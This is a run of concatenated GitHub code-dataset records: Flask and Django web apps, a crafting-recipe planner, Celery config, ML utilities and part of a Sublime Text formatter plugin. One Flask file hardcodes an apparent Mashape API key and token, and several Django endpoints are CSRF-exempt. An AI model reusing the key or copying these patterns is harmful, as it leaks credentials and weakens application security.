35\n },\n 'SES' : \n [\n '유진','바다','슈'\n ]\n }\n\n return idols\n\n@app.route('/post/')\ndef post(num):\n posts = ['0번 포스트', '1번 포스트','2번 포스트']\n return posts[num]\n\n\n# 실습 - cube뒤에 전달된 수의 세제곱수를 화면에 보여주세요\n@app.route('/cube/')\ndef cube(num):\n num_Cube = num**3\n return str(num_Cube)\n\n# 클라이언트에게 html 파일을 줌\n@app.route('/html')\ndef html():\n return render_template('hello.html')\n\n@app.route('/ping')\ndef ping():\n return render_template('ping.html')\n\n@app.route('/pong')\ndef pong():\n age = request.args.get('age')\n #age = request.agrs['age'] 거의 유사하게 동작. 다만 오류가 났을 때 발생하는 문제가 다름\n return render_template('pong.html',age_in_html=age)\n\n# 로또번호를 가져와서 보여주는 서버\n@app.route('/lotto_result/')\ndef lotto_result(round):\n url=f'https://www.nlotto.co.kr/common.do?method=getLottoNumber&drwNo={round}'\n result = requests.get(url).json()\n\n winner = []\n for i in range(1,7):\n winner.append(result.get(f'drwtNo{i}')) #.get을 쓰지않고 []를 하면 키가 없을 경우 서버가 에러.\n winner.append(result.get('bnusNo')) \n return json.dumps(winner)\n \napp.run(debug=True)","repo_name":"Yangsiyoung0901/python_server","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41684166546","text":"import torch\n\n\ndef get_reductors(gto, charges, npcas, species):\n \n reductors = {}\n \n for e in species:\n\n indexes = charges == e\n\n sub = gto[indexes]\n \n if (sub.shape[0] == 0):\n continue\n \n perm = torch.randperm(sub.size(0))\n idx = perm[:512]\n\n choice_input = sub[idx]\n \n eigvecs, eigvals, vh = torch.linalg.svd(choice_input.T, full_matrices=False)\n \n cev = 100 - (torch.sum(eigvals) - torch.sum(eigvals[:npcas])) / torch.sum(eigvals) * 100\n \n reductor = eigvecs[:,:npcas]\n size_from = reductor.shape[0]\n size_to = reductor.shape[1]\n \n print (f\"{size_from} -> {size_to} Cumulative Explained Feature Variance = {cev:6.2f} %%\")\n \n reductors[e] = reductor\n \n return reductors\n\n\ndef project_representation(X, reductor):\n \n '''\n \n projects the representation from shape: \n nsamples x repsize \n to \n nsamples x npcas\n \n '''\n \n return torch.matmul(X, reductor)\n\n\ndef project_derivative(dX, reductor):\n '''\n \n projects the representation derivative from shape:\n \n nsamples x natoms x 3 x repsize \n to \n nsamples x natoms x 3 x npcas\n \n '''\n\n return torch.einsum('jmnk, kl->jmnl', dX, reductor)\n","repo_name":"nickjbrowning/qml-lightning","sub_path":"qml_lightning/representations/dimensionality_reduction.py","file_name":"dimensionality_reduction.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"41187366741","text":"import json\nfrom apiclient.discovery import build\n\nAPPLICATION_NAME = 'ZooDel'\nSERVICE = build('plus', 'v1')\n\nPPS_STRUCT = 'pps'\nPOS_TAGS = 'pps_pos_tags'\nUSERS = 'users'\nMAIN_PPS = 'main_pps'\nKEYS = 'user_doc_key'\nPERSIST = 'persistent'\nYES = 'YES'\nNO = 'NO'\nPHI = '0'\nCURSOR_POS = 'cursor_pos'\nCURSOR_COLOR = 'cursor_color'","repo_name":"saitejar/colabedit","sub_path":"app/model/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1129193934","text":"from __future__ import absolute_import\nfrom celery.schedules import crontab\n\nbroker_url = \"redis://127.0.0.1:6379/5\"\nresult_backend = 
\"redis://127.0.0.1:6379/6\"\n\ntask_serializer = 'json'\nresult_serializer = 'json'\naccept_content = ['json']\ntimezone = \"Asia/Shanghai\" # 时区设置\nworker_hijack_root_logger = False # celery默认开启自己的日志,可关闭自定义日志,不关闭自定义日志输出为空\nresult_expires = 60 * 60 * 24 # 存储结果过期时间(默认1天)\n\n# 导入任务所在文件\nimports = [\n \"celery_task.epp_scripts.spider_task\", # 导入py文件\n]\n\n\n# 需要执行任务的配置\nbeat_schedule = {\n \"ip_spider\": {\n \"task\": \"celery_task.epp_scripts.spider_task.ip_spider\", # 执行的函数\n \"schedule\": crontab(minute=0, hour=0), # 每天凌晨12点\n \"args\": () # 任务函数参数\n },\n}\n","repo_name":"Lknj/IpPool","sub_path":"celery_task/celery_config.py","file_name":"celery_config.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11994741610","text":"from django.http import HttpResponse\nfrom craftapp.models import Recipe, Machine, Slotdata, Item, ByProducts\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.shortcuts import get_object_or_404\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom math import ceil\nfrom itertools import product\n\ndef key_format(key):\n if type(key) == int:\n return str(key)\n else:\n return '\"{}\"'.format(str(key))\n\ndef dict_to_lua(input):\n if type(input) in {float, int, np.int64}:\n return str(input)\n elif type(input) == bool:\n return str(input).lower()\n elif type(input) == str:\n return '\"{}\"'.format(str(input))\n elif type(input) == dict:\n if len(input) == 0:\n return '{}'\n else:\n return '{' + ', '.join([ '[{}] = {}'.format(key_format(key), dict_to_lua(value)) for (key, value) in input.items()]) + '}'\n else:\n assert(False), \"Cannot process \" + str(type(input)) + \" (datatypes other than dict of dict with literals)\"\n\ndef find_or_create_item(item_dict):\n try:\n item = Item.objects.get(item_id = item_dict['id'])\n except Item.DoesNotExist:\n item = Item.objects.create(\n item_id = item_dict['id'],\n display_name = item_dict['display_name'],\n max_stack = item_dict['stack_size']\n )\n return item\n\n# revamped = YES\ndef index(request):\n return HttpResponse(\"Hello, world. 
You're on the beautiful craftapp front page.\")\n\n# revamped: YES\ndef get_machines(request):\n return HttpResponse('\\n'.join(Machine.objects.all().values_list('name', flat = True)), content_type = 'text/plain')\n\n# revamped: YES\n@csrf_exempt\ndef add_machine(request):\n if request.method == 'POST':\n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n new_machine = request.body.decode('UTF-8')\n if len(Machine.objects.filter(name = new_machine)) == 0:\n Machine.objects.create(name = new_machine)\n return HttpResponse('Added to database!')\n else:\n return HttpResponse(str(new_machine) + ' already in database!')\n else:\n return HttpResponse(status = 400)\n\n# revamped: YES\n@csrf_exempt\ndef new_alias(request):\n if request.method == 'POST':\n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n alias_str = request.body.decode('UTF-8')\n machines_list = [get_object_or_404(Machine, name = machinename) for machinename in alias_str.split(',')]\n if not len(machines_list) == 2:\n print('Add alias HTTP request must have two arguments.')\n return HttpResponse(status = 400)\n \n machines_list[0].add_alias(machines_list[1])\n machines_list[1].add_alias(machines_list[0]) \n\n return HttpResponse('Success')\n else:\n return HttpResponse(status = 400)\n\n# revamped = YES\ndef get_recipe_names(request):\n names = Recipe.objects.all().values_list('recipe_name__display_name',flat = True).distinct()\n return HttpResponse('\\n'.join(names), content_type = 'text/plain')\n\n# revamped = YES\ndef recipe_func(request, recipeid):\n r = get_object_or_404(Recipe, pk = recipeid)\n output_dict = {\n 'recipe_name' : r.recipe_name.item_id,\n 'display_name' : r.recipe_name.display_name,\n 'makes' : r.makes,\n 'has_byproducts' : len(r.byproducts_set.all()) > 0,\n 'is_shapeless' : r.is_shapeless,\n 'max_stack' : r.recipe_name.max_stack,\n 'min_maxstack' : r.min_maxstack()\n }\n \n output_dict['slotdata'] = {\n slotnum : {'item':slot.item.item_id, 'quantity' : slot.quantity} for slot in r.slotdata_set.all() for slotnum in slot.slots.split(',')\n }\n\n output_dict['by_products'] = {\n item : quantity for (item, quantity) in r.byproducts_set.all()\n }\n \n output_dict['machine_with'] = {\n i + 1 : machine.name for (i, machine) in enumerate([r.machine_with, *r.machine_with.aliases.all()])\n } \n\n output_dict['is_crafted'] = output_dict['machine_with'][1] == 'Crafter'\n\n return HttpResponse(dict_to_lua(output_dict), content_type = 'text/plain')\n\n# revamped: YES\n@csrf_exempt\ndef add_recipe(request):\n if request.method == 'POST':\n \n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n \n valid_post_keys = ['recipe_name', 'machine_with', 'makes', 'is_shapeless', 'slotdata', 'by_products']\n recipedata = json.loads(request.body)\n\n if not all([key in recipedata.keys() for key in valid_post_keys]):\n return HttpResponse(status = 400)\n \n try:\n machine = Machine.objects.get(name = recipedata['machine_with'])\n except Machine.DoesNotExist:\n machine = Machine.objects.create(name = recipedata['machine_with'])\n \n output_item = find_or_create_item(recipedata['recipe_name'])\n \n #create slot tuples in format (itemname, mod, slot, quantity)\n slot_tuples = set([\n (find_or_create_item(x['item']).id, int(slot), x['quantity']) for slot, x in recipedata['slotdata'].items()\n ])\n #check for dups\n for recipe in output_item.recipe_set.all():\n recipe_set = recipe.get_slotdata_tuples()\n if len(slot_tuples) == len(recipe_set) == len(recipe_set & 
slot_tuples):\n return HttpResponse('Duplicate recipe')\n \n slotdata_df = pd.DataFrame(slot_tuples, columns = ['item','slot','quantity'])\n pre_slotdata_df = slotdata_df.groupby(['item','quantity']).agg(lambda x : list(x))\n \n newRecipe = Recipe.objects.create(\n recipe_name = output_item,\n makes = recipedata['makes'],\n machine_with = machine,\n is_shapeless = recipedata['is_shapeless'])\n\n for (index, row) in pre_slotdata_df.iterrows():\n newRecipe.slotdata_set.create(\n slots = ','.join([str(x) for x in row.values[0]]),\n item = Item.objects.get(pk = index[0]),\n quantity = index[1]\n )\n \n for byproducts_dict in recipedata['by_products'].values():\n new_item = find_or_create_item(byproducts_dict['item'])\n newRecipe.byproducts_set.create(item = new_item, quantity = byproducts_dict['quantity'])\n \n return HttpResponse('Added to database!')\n else:\n return HttpResponse(status = 400)\n\n#revamped: YES\ndef instructions(request):\n if not request.method == 'GET':\n print('Request for instructions did not include GET method')\n return HttpResponse(status = 400)\n \n try:\n if not 'HTTP_INVENTORY' in request.META:\n inventory = Counter()\n else:\n inventory = Counter(json.loads(request.META['HTTP_INVENTORY']))\n \n if not 'HTTP_MACHINES' in request.META:\n machines = set()\n else:\n machines = set([machine_name for color, machine_name in json.loads(request.META['HTTP_MACHINES']).items()])\n \n recurse_item = get_object_or_404(Item, display_name = request.GET['for'])\n inventory[recurse_item.item_id] = 0\n tree_summary = Item_Node(recurse_item, int(request.GET['quantity']), inventory, set(), machines)\n except:\n return HttpResponse(status == 500)\n #write methods for tree_summary printing\n return HttpResponse(tree_summary.lua_output(), content_type = 'text/plain')\n\n\nclass OrderedCounter(Counter, OrderedDict):\n #'Counter that remembers the order elements are first encountered'\n def __repr__(self):\n return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))\n\n def __reduce__(self):\n return self.__class__, (OrderedDict(self),)\n\n def __str__(self):\n return '{' + ', '.join(['{}: {}'.format(key,value) for key, value in self.items()]) + '}'\n\n\ndef Item_Node(item, order_quantity, available_resources = Counter(), parent_set = set(), machines = set()):\n \n #print('Enter name node: ', search_name)\n # define an order for this name node\n order = Craft_Order()\n parent_set.add(item.item_id)\n # if there is this stuff in the inventory, subtract\n recipe_options = item.recipe_set.all()\n\n if available_resources[item.item_id] >= order_quantity:\n available_resources[item.item_id] -= order_quantity\n order.used_resources[item.item_id] += order_quantity\n return order\n else:\n # else decrement the order quanitity and continue\n num_availabe = available_resources[item.item_id]\n if len(recipe_options) == 0:\n order.missing_resources[item.item_id] += order_quantity - num_availabe\n order.is_leaf = True\n order.used_resources = Counter()\n return order\n else:\n order.used_resources[item.item_id] += num_availabe\n available_resources[item.item_id] = 0\n order_quantity -= num_availabe\n\n # else add leaves \n children = [\n Recipe_Node(recipe, order_quantity, available_resources.copy(),parent_set.copy(), machines)\n for recipe in recipe_options\n ]\n \n score_columns = ['machines_attached', 'missing_resources','used_resources','num_steps']\n #print(*[craftorder.score() for craftorder in children])\n score_df = pd.DataFrame([craftorder.score() for craftorder in children], columns = 
score_columns)\n score_df.sort_values(score_columns, inplace = True)\n\n #print(str(score_df))\n\n return Craft_Order.union([children[score_df.iloc[0].name], order])\n\ndef Recipe_Node(recipe, order_quantity, available_resources, parent_set, machines):\n\n #print('Enter recipe node: ', recipe_name)\n #print(parent_set)\n # instantiate a craftorder for this recipe\n this_order = Craft_Order()\n # query to obtain recipe\n recipe_data = recipe.slotdata_set.all()\n \n #if no recipe, add to missing\n if len(recipe_data) == 0:\n this_order.missing_resources[recipe.recipe_name.item_id] = order_quantity\n return this_order\n \n #recipe = pd.DataFrame(db_recipe_data, columns = ['slot','item','quantity'])\n \n # check for cycles\n if len(parent_set & set(recipe_data.values_list('item__item_id', flat = True))) > 0:\n #print('recipe name: ', recipe_name)\n #print(*zip(recipe['item'].values, [parent_name in parent_set for parent_name in recipe['item'].values]))\n this_order.missing_resources[recipe.recipe_name.item_id] = order_quantity\n return this_order\n\n # adjust for makes, stuff like that\n num_operations_required = ceil(order_quantity / recipe.makes)\n # for each component, grouped:\n children = []\n #for (component_name, num_required) in recipe[['item','quantity']].groupby('item').sum().iterrows():\n for slot_info in recipe_data:\n # new node for every component type\n subtree_order = Item_Node(slot_info.item, slot_info.quantity * (len(slot_info.slots) + 1)/2 * num_operations_required, available_resources.copy(), parent_set)\n # subtract used resources from the pool of available resources\n available_resources -= subtree_order.used_resources\n # add the child node\n children.append(subtree_order)\n \n # consolidate the craftorders with this order\n this_order = Craft_Order.union([*children, this_order])\n\n # if this crafting is successful, add a step, if not\n if this_order.can_craft():\n # compensate for overflow\n overflow = (recipe.makes * num_operations_required) - order_quantity\n this_order.used_resources[recipe.recipe_name.item_id] = -1 * overflow\n # add the step\n this_order.add_step(recipe.id, num_operations_required)\n this_order.has_all_machines = recipe.machine_with.name == 'Crafter' or len(set(recipe.machine_with.all_possible_machines()) & machines) > 0\n return this_order\n\nclass Craft_Order:\n def __init__(self):\n self.used_resources = Counter()\n self.missing_resources = Counter()\n self.queue = OrderedCounter()\n self.is_leaf = True\n self.has_all_machines = True\n\n def add_step(self, execute_id, quantity):\n self.queue[execute_id] += quantity\n self.is_leaf = False\n \n @staticmethod\n def union(orders):\n sum_order = Craft_Order()\n for order in orders:\n sum_order.used_resources += order.used_resources\n sum_order.missing_resources += order.missing_resources\n sum_order.queue += order.queue\n sum_order.has_all_machines = sum_order.has_all_machines & order.has_all_machines\n return sum_order\n\n def can_craft(self):\n return sum(self.missing_resources.values()) == 0\n \n def get_summary(self):\n return self.queue\n\n def score(self):\n return (not self.has_all_machines, sum(self.missing_resources.values()),sum(self.used_resources.values()), len(self.queue))\n\n # implement!\n def lua_output(self):\n output_dict = {\n 'missing_resouces': {\n Item.objects.get(item_id = item_rawname).display_name : quantity for (item_rawname, quantity) in self.missing_resources.items()\n },\n 'craft_queue' : {\n i + 1 : {'id' : recipe_id, 'quantity' : self.queue[recipe_id], 'name' : 
Recipe.objects.get(pk = recipe_id).recipe_name.item_id} for i, recipe_id in enumerate(self.queue)\n },\n 'resources_used': dict(self.used_resources),\n }\n return dict_to_lua(output_dict)\n\n def __str__(self):\n new_dict = {\n str(key) : val for (key,val) in self.queue.items()\n }\n return counter_pretty_print(new_dict, 'Queue') +'\\n' + counter_pretty_print(self.used_resources,'Used') + '\\n' + counter_pretty_print(self.missing_resources, 'Missing')\n\n\ndef counter_pretty_print(counter,title):\n if len(counter) == 0:\n return title + ':\\nNone\\n'\n output = title + ':\\n--{:-<30}---{:-^5}--\\n'.format('Item','Num')\n for (key, val) in counter.items():\n output += '| {:30} | {:>5} |\\n'.format(str(key),str(val))\n output += '-'*42\n return output + '\\n'","repo_name":"AllenWLynch/craft_server","sub_path":"craftapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30482363637","text":"from flask import Flask,render_template,request,url_for,jsonify,json\nimport unirest\napp = Flask(__name__)\n\nheaders={\"X-Mashape-Key\": \"UJufyI4Lj9mshuzkxbrZcqcIBUgOp1DgxfejsnqnsqaDWhwGzL\",\"Accept\": \"application/json\"}\ntoken=\"34272aa31x1a6776666a\"\n@app.route(\"/\",methods=['GET','POST'])\ndef modal_details(region):\n with open ('data/model.json') as f:\n data = json.loads(f.read())\n data=json.dumps(data)\n return data\n\n@app.route(\"//\",methods=['GET','POST'])\ndef event_detail(region,event_id):\n with open ('data/model.json') as f:\n data = json.loads(f.read())\n for i in data:\n if i[\"event_id\"]==event_id:\n return jsonify(i)\n return \"event_id not found\"\n\n@app.route(\"/mapinfo\",methods=['GET','POST'])\ndef map_info():\n with open ('data/mapinfo.json') as f:\n data = json.loads(f.read())\n return data\n\n\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"rahulyadav170923/fhacking_eventhub","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21365913366","text":"# -*- coding: utf-8 -*-\n\nfrom context import mlp, svm\n\nimport unittest, numpy, pandas\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nclass IrisTestSuite(unittest.TestCase):\n \"\"\"Suíte de testes para MLP e SVM utilizando conjunto de dados iris.\"\"\"\n\n def test_iris(self):\n \"\"\"Treina um MLP e um SVM para classificação do conjunto de dados iris.\"\"\"\n\n # Lê arquivo de dados\n dataset = pandas.read_csv('../datasets/iris/iris.data', sep=',')\n X = dataset.ix[:, dataset.columns != 'class'].to_dict(orient='records')\n y = dataset.ix[:, dataset.columns == 'class'].as_matrix()[:,0]\n\n vectorizer = DictVectorizer(sparse = False)\n X = vectorizer.fit_transform(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25)\n\n classifier = mlp.MLP(hidden_layer_size=10)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n print(classification_report(y_test, y_pred))\n\n classifier = svm.SVM(kernel='linear', C=1)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n print(classification_report(y_test, y_pred))\n\n assert True\n\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"fberanizo/sin5016","sub_path":"tests/test_iris.py","file_name":"test_iris.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8237040183","text":"import hashlib\nimport logging\nimport os\nimport re\nimport sys\nimport tempfile\nimport sublime\nif sys.version_info < (3, 4):\n from imp import reload\nelse:\n from importlib import reload\nfrom subprocess import Popen, PIPE\nfrom os.path import (basename, expanduser, expandvars, isdir, isfile, join,\n exists, normcase, normpath, pathsep, split, splitext, dirname)\n\nlog = logging.getLogger(__name__)\n\nIS_WINDOWS = sublime.platform() == 'windows'\nPACKAGE_NAME = 'Formatter'\nASSETS_DIRECTORY = 'formatter.assets'\nRECURSIVE_SUCCESS_DIRECTORY = '__format_success__'\nRECURSIVE_FAILURE_DIRECTORY = '__format_failure__'\nSTATUS_KEY = '@!' + PACKAGE_NAME.lower()\n\nLAYOUTS = {\n 'single': {\n 'cols': [0.0, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1]]\n },\n '2cols': {\n 'cols': [0.0, 0.5, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n },\n '2rows': {\n 'cols': [0.0, 1.0],\n 'rows': [0.0, 0.5, 1.0],\n 'cells': [[0, 0, 1, 1], [0, 1, 1, 2]]\n }\n}\n\n\ndef generate_ascii_tree(reloaded_modules, package_name):\n tree = {}\n\n for module in reloaded_modules:\n parts = module.split('.')\n current_node = tree\n for part in parts:\n current_node = current_node.setdefault(part, {})\n\n def print_tree(node, prefix):\n sorted_keys = sorted(node.keys())\n for i, key in enumerate(sorted_keys):\n is_last = i == len(sorted_keys) - 1\n print(prefix + ('└── ' if is_last else '├── ') + key)\n print_tree(node[key], prefix + (' ' if is_last else '│ '))\n\n print(package_name)\n print_tree(tree[package_name], '')\n\ndef reload_modules():\n reloaded_modules = []\n modules_copy = dict(sys.modules)\n for module_name, module in modules_copy.items():\n if module_name.startswith(PACKAGE_NAME + '.') and module:\n reloaded_modules.append(module_name)\n try:\n reload(module)\n except Exception as e:\n log.error('Error reloading module %s: %s', module_name, str(e))\n return None\n log.debug('Reloaded modules (Python %s):', '.'.join(map(str, sys.version_info[:3])))\n generate_ascii_tree(reloaded_modules, PACKAGE_NAME)\n\ndef config_file():\n return PACKAGE_NAME + '.sublime-settings'\n\ndef get_config():\n settings = sublime.load_settings(config_file())\n settings.add_on_change('@reload@', load_config)\n build_config(settings)\n\ndef load_config():\n settings = sublime.load_settings(config_file())\n build_config(settings)\n\ndef build_config(settings):\n global config\n\n # Sublime settings dict is immutable and unordered\n config = {\n 'debug': settings.get('debug', False),\n 'dev': settings.get('dev', False),\n 'open_console_on_failure': settings.get('open_console_on_failure', False),\n 'show_statusbar': settings.get('show_statusbar', True),\n 'layout': {\n 'enable': query(settings, False, 'layout', 'enable'),\n 'sync_scroll': query(settings, False, 'layout', 'sync_scroll')\n },\n 'environ': settings.get('environ', {}),\n 'formatters': settings.get('formatters', {})\n }\n config['formatters'].pop('example', None)\n config = recursive_map(expand_path, config)\n return config\n\ndef assign_layout(layout):\n return LAYOUTS.get(layout, None)\n\ndef want_layout():\n return query(config, False, 'layout', 'enable') in LAYOUTS\n\ndef setup_layout(view):\n layout = query(config, False, 'layout', 'enable')\n if layout in 
LAYOUTS:\n view.window().set_layout(assign_layout(layout))\n return True\n return False\n\ndef recursive_map(func, data):\n if isinstance(data, dict):\n return dict(map(lambda item: (item[0], recursive_map(func, item[1])), data.items()))\n elif isinstance(data, list):\n return list(map(lambda x: recursive_map(func, x), data))\n else:\n return func(data)\n\ndef update_environ():\n try:\n environ = os.environ.copy()\n for key, value in config.get('environ').items():\n if value and isinstance(value, list):\n pathstring = environ.get(key, None)\n items = list(filter(None, value))\n if items:\n if pathstring:\n paths = pathstring.split(pathsep)\n [i if normpath(i) in paths else paths.insert(0, normpath(i)) for i in reversed(items)]\n environ[key] = pathsep.join(paths)\n else:\n environ[key] = pathsep.join(map(normpath, items))\n return environ\n except Exception as error:\n log.warning('Could not clone system environment: %s', error)\n return None\n\ndef setup_shared_config_files():\n src = 'Packages/' + PACKAGE_NAME + '/config'\n dst = join(sublime.packages_path(), 'User', ASSETS_DIRECTORY, 'config')\n\n try:\n os.makedirs(dst, exist_ok=True)\n except OSError as e:\n if e.errno != os.errno.EEXIST:\n log.warning('Could not create directory: %s', dst)\n return None\n\n if not isdir(dst):\n log.warning('Could not create directory: %s', dst)\n return None\n\n for resource in sublime.find_resources('*'):\n if resource.startswith(src):\n file = basename(resource)\n path = join(dst, file)\n if isfile(path):\n try:\n res = sublime.load_binary_resource(resource)\n hash_src = hashlib.md5(res).hexdigest()\n hash_dst = md5f(path)\n master_path = '{0}.{2}{1}'.format(*splitext(path) + ('master',))\n hash_dst_master = md5f(master_path) if isfile(master_path) else None\n\n if not hash_dst_master or (hash_dst_master and hash_src != hash_dst_master):\n with open(master_path, 'wb') as f:\n f.write(res)\n log.debug('Setup shared master config: %s', master_path)\n except Exception as e:\n log.warning('Could not setup shared master config: %s\\n%s', master_path, e)\n else:\n try:\n res = sublime.load_binary_resource(resource)\n with open(path, 'wb') as f:\n f.write(res)\n log.debug('Setup shared config: %s', path)\n except Exception as e:\n log.warning('Could not setup shared config: %s\\n%s', path, e)\n return True\n\ndef md5f(fname):\n hash_md5 = hashlib.md5()\n with open(fname, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b''):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\ndef get_pathinfo(path):\n try:\n cwd = tempfile.gettempdir()\n except AttributeError:\n # Fallback to ${HOME} for unsaved buffer\n cwd = expanduser('~')\n base = stem = suffix = ext = None\n if path:\n cwd, base = split(path)\n stem, suffix = splitext(base)\n ext = suffix[1:]\n return {'path': path, 'cwd': cwd, 'base': base, 'stem': stem, 'suffix': suffix, 'ext': ext}\n\ndef exec_cmd(cmd, cwd):\n info = None\n if IS_WINDOWS:\n from subprocess import STARTUPINFO, STARTF_USESHOWWINDOW, SW_HIDE\n # Hide the console window to avoid flashing an\n # ugly cmd prompt on Windows when invoking plugin.\n info = STARTUPINFO()\n info.dwFlags |= STARTF_USESHOWWINDOW\n info.wShowWindow = SW_HIDE\n\n # Input cmd must be a list of strings\n process = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE, cwd=cwd,\n env=update_environ(), shell=IS_WINDOWS, startupinfo=info)\n return process\n\ndef query(data_dict, default=None, *keys):\n for key in keys:\n if not isinstance(data_dict, (dict, sublime.Settings)):\n return default\n data_dict = 
data_dict.get(key, default)\n return data_dict\n\ndef is_view(file_or_view):\n return (type(file_or_view) is sublime.View)\n\ndef is_text_data(data):\n try:\n data = data.decode('utf-8')\n return data\n except (UnicodeDecodeError, AttributeError):\n return False\n\ndef is_text_file(file_path):\n try:\n with open(file_path, 'r', encoding='utf-8') as f:\n next(f)\n return True\n except UnicodeDecodeError:\n return False\n\ndef run_once(func):\n def wrapper(*args, **kwargs):\n if not wrapper.has_run:\n wrapper.has_run = True\n return func(*args, **kwargs)\n wrapper.has_run = False\n\n def reset_run():\n wrapper.has_run = False\n wrapper.reset_run = reset_run\n return wrapper\n\ndef get_unique(data):\n if isinstance(data, list):\n unique_list = []\n for item in data:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n elif isinstance(data, dict):\n unique_keys = []\n unique_values = []\n unique_dict = {}\n for key, value in data.items():\n if key not in unique_keys and value not in unique_values:\n unique_keys.append(key)\n unique_values.append(value)\n unique_dict[key] = value\n return unique_dict\n else:\n raise ValueError('Input data type not supported')\n\ndef get_recursive_filelist(dir, exclude_dirs_regex, exclude_files_regex, exclude_extensions):\n text_files = []\n for root, dirs, files in os.walk(dir):\n dirs[:] = [d for d in dirs if not any(re.match(pattern, d) for pattern in exclude_dirs_regex) and d not in [RECURSIVE_SUCCESS_DIRECTORY, RECURSIVE_FAILURE_DIRECTORY]]\n for file in files:\n p = get_pathinfo(file)\n if p['ext'] in exclude_extensions or not p['ext'] and p['base'] == p['stem'] and p['stem'] in exclude_extensions:\n continue\n if any(re.match(pattern, file) for pattern in exclude_files_regex):\n continue\n file_path = join(root, file)\n if is_text_file(file_path):\n text_files.append(file_path)\n return text_files\n\ndef expand_path(path):\n if path and isinstance(path, str):\n variables = sublime.active_window().extract_variables()\n path = sublime.expand_variables(path, variables)\n path = normpath(expanduser(expandvars(path)))\n # log.debug('Normalized path: %s', path)\n return path\n\ndef is_exe(file):\n if file and isinstance(file, str) and exists(file) and isfile(file):\n if os.access(file, os.F_OK | os.X_OK):\n return True\n if not IS_WINDOWS:\n import stat\n os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC)\n log.debug('Set executable permission for: %s', file)\n return True\n log.warning('File exists but cannot be executed: %s', file)\n return False\n\ndef get_environ_path(fnames):\n if fnames and isinstance(fnames, list):\n environ = update_environ()\n if environ and isinstance(environ, dict):\n path = environ.get('PATH', os.defpath)\n if path:\n dirs = path.split(pathsep)\n if IS_WINDOWS:\n pathext = os.environ.get('PATHEXT', '').split(pathsep)\n final = [[fn, ext] for fn in fnames for ext in pathext if any([fn.lower().endswith(ext.lower())])]\n if final:\n files = [final[0][0]]\n else:\n files = [fn + ext for fn in fnames for ext in pathext]\n else:\n files = fnames\n seen = set()\n for dir in dirs:\n normdir = normcase(dir)\n if not normdir in seen:\n seen.add(normdir)\n for thefile in files:\n file = join(dir, thefile)\n if is_exe(file):\n return file\n else:\n log.error('\"PATH\" or default search path does not exist: %s', path)\n else:\n log.error('System environment is empty or not of type dict: %s', environ)\n else:\n log.error('File names variable is empty or not of type list: %s', fnames)\n return None\n\ndef 
get_head_cmd(uid, intr_names, exec_names):\n interpreter = get_runtime_path(uid, intr_names, 'interpreter')\n executable = get_runtime_path(uid, exec_names, 'executable')\n if not interpreter or not executable:\n return None\n cmd = [interpreter, executable]\n args = get_args(uid)\n if args:\n cmd.extend(args)\n return cmd\n\ndef get_runtime_path(uid, fnames, path_type):\n if path_type not in ['interpreter', 'executable']:\n log.error('Invalid runtime type. Either use the keyword \"interpreter\" or \"executable\".')\n return None\n\n local_file = query(config, None, 'formatters', uid, path_type + '_path')\n if local_file and not isfile(local_file):\n log.error('File does not exist: %s', local_file)\n return None\n if is_exe(local_file):\n log.debug('%s: %s', path_type.capitalize(), local_file)\n return local_file\n global_file = get_environ_path(fnames)\n if global_file:\n return global_file\n log.error('Could not find %s: %s', path_type, fnames)\n return None\n\ndef get_config_path(view, uid, region, is_selected):\n shared_config = query(config, None, 'formatters', uid, 'config_path')\n if shared_config and isinstance(shared_config, dict):\n syntax = get_assigned_syntax(view, uid, region, is_selected)\n for key, path in shared_config.items():\n if key.strip().lower() == syntax and path and isinstance(path, str) and isfile(path) and os.access(path, os.R_OK):\n log.debug('Config [%s]: %s', syntax, path)\n return path\n default_path = shared_config.get('default', None)\n if default_path and isinstance(default_path, str) and isfile(default_path) and os.access(default_path, os.R_OK):\n log.debug('Config [default]: %s', default_path)\n return default_path\n log.warning('Could not obtain config file for syntax: %s', syntax)\n log.warning('Default core config will be used instead if any.')\n return None\n log.warning('Setting key \"config_path\" is empty or not of type dict: %s', shared_config)\n log.warning('Default core config will be used instead if any.')\n return None\n\ndef get_assigned_syntax(view, uid, region, is_selected):\n syntaxes = query(config, None, 'formatters', uid, 